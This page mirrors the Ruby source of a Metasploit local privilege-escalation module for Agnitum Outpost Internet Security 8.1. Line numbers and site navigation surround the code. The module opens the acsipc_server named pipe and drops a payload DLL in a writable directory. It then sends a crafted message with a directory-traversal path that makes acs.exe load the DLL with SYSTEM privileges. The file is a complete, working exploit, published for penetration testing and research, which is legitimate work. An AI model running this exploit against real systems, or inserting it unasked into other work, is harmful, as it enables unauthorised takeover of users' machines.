Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/agnitum_outpost_acs.rb
24946 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Post::File

11
  include Msf::Post::Windows::Priv

12
  include Msf::Post::Windows::Process

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'Agnitum Outpost Internet Security Local Privilege Escalation',

21
          'Description' => %q{

22
            This module exploits a directory traversal vulnerability on Agnitum Outpost Internet

23
            Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load

24
            arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary

25
            code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with

26
            Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).

27
          },

28
          'License' => MSF_LICENSE,

29
          'Author' => [

30
            'Ahmad Moghimi', # Vulnerability discovery

31
            'juan vazquez' # MSF module

32
          ],

33
          'Arch' => [ARCH_X86, ARCH_X64],

34
          'Platform' => 'win',

35
          'SessionTypes' => [ 'meterpreter' ],

36
          'Privileged' => true,

37
          'Targets' => [

38
            [ 'Agnitum Outpost Internet Security 8.1', {} ],

39
          ],

40
          'Payload' => {

41
            'Space' => 2048,

42
            'DisableNops' => true

43
          },

44
          'References' => [

45
            [ 'CVE', '2013-10046' ],

46
            [ 'OSVDB', '96208' ],

47
            [ 'EDB', '27282' ]

48
          ],

49
          'DisclosureDate' => '2013-08-02',

50
          'DefaultTarget' => 0,

51
          'Compat' => {

52
            'Meterpreter' => {

53
              'Commands' => %w[

54
                stdapi_railgun_api

55
                stdapi_sys_config_getenv

56
              ]

57
            }

58
          },

59
          'Notes' => {

60
            'Reliability' => UNKNOWN_RELIABILITY,

61
            'Stability' => UNKNOWN_STABILITY,

62
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
          }

64
        }

65
      )

66
    )

67


68
    register_options([

69
      # It is OptPath becuase it's a *remote* path

70
      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),

71
      # By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\

72
      OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])

73
    ])

74
  end

75


76
  def junk

77
    return rand_text_alpha(4).unpack("V").first

78
  end

79


80
  def open_named_pipe(pipe)

81
    invalid_handle_value = 0xFFFFFFFF

82


83
    r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)

84


85
    handle = r['return']

86


87
    if handle == invalid_handle_value

88
      return nil

89
    end

90


91
    return handle

92
  end

93


94
  def write_named_pipe(handle, dll_path, dll_name)

95
    traversal_path = "..\\" * datastore["DEPTH"]

96
    traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "")

97
    traversal_path << "\\#{dll_name}"

98


99
    path = Rex::Text.to_unicode(traversal_path)

100


101
    data = "\x00" * 0x11

102
    data << path

103
    data << "\x00\x00"

104
    data << "\x00\x00\x00"

105


106
    buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler

107
    buf << [0x17].pack("V") # command

108
    buf << [junk].pack("V")

109
    buf << [data.length].pack("V")

110
    buf << [0, 0, 0].pack("V*")

111
    buf << data

112


113
    w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)

114


115
    if w['return'] == false

116
      print_error("The was an error writing to disk, check permissions")

117
      return nil

118
    end

119


120
    return w['lpNumberOfBytesWritten']

121
  end

122


123
  def check

124
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")

125
    if handle.nil?

126
      return Exploit::CheckCode::Safe

127
    end

128


129
    session.railgun.kernel32.CloseHandle(handle)

130
    return Exploit::CheckCode::Detected

131
  end

132


133
  def exploit

134
    temp_dir = ""

135


136
    print_status("Opening named pipe...")

137
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")

138
    if handle.nil?

139
      fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found")

140
    else

141
      print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...")

142
    end

143


144
    if datastore["WritableDir"] and not datastore["WritableDir"].empty?

145
      temp_dir = datastore["WritableDir"]

146
    else

147
      temp_dir = client.sys.config.getenv('TEMP')

148
    end

149


150
    print_status("Using #{temp_dir} to drop malicious DLL...")

151
    begin

152
      cd(temp_dir)

153
    rescue Rex::Post::Meterpreter::RequestError

154
      session.railgun.kernel32.CloseHandle(handle)

155
      fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")

156
    end

157


158
    print_status("Writing malicious DLL to remote filesystem")

159
    write_path = pwd

160
    dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"

161
    begin

162
      # Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem

163
      write_file(dll_name, generate_payload_dll)

164
      register_file_for_cleanup("#{write_path}\\#{dll_name}")

165
    rescue Rex::Post::Meterpreter::RequestError

166
      session.railgun.kernel32.CloseHandle(handle)

167
      fail_with(Failure::BadConfig, "Failed to drop payload into #{temp_dir}")

168
    end

169


170
    print_status("Exploiting through \\\\.\\pipe\\acsipc_server...")

171
    bytes = write_named_pipe(handle, write_path, dll_name)

172
    session.railgun.kernel32.CloseHandle(handle)

173


174
    if bytes.nil?

175
      fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server")

176
    end

177
  end

178
end

179


180